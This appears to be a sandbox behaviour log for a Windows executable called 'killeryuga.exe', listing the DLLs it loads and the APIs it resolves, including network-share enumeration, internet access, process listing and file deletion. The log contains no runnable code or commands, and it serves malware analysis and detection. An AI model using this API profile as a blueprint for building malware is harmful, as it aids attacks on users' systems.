Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:30 (UTC) True 1
Fn
System Get Time type = Ticks, time = 112882 True 1
Fn
System Get Time type = Performance Ctr, time = 17412281778 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x75ee0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x74b30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x74b33058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x74b32f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x74b32dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x753d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x74af0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
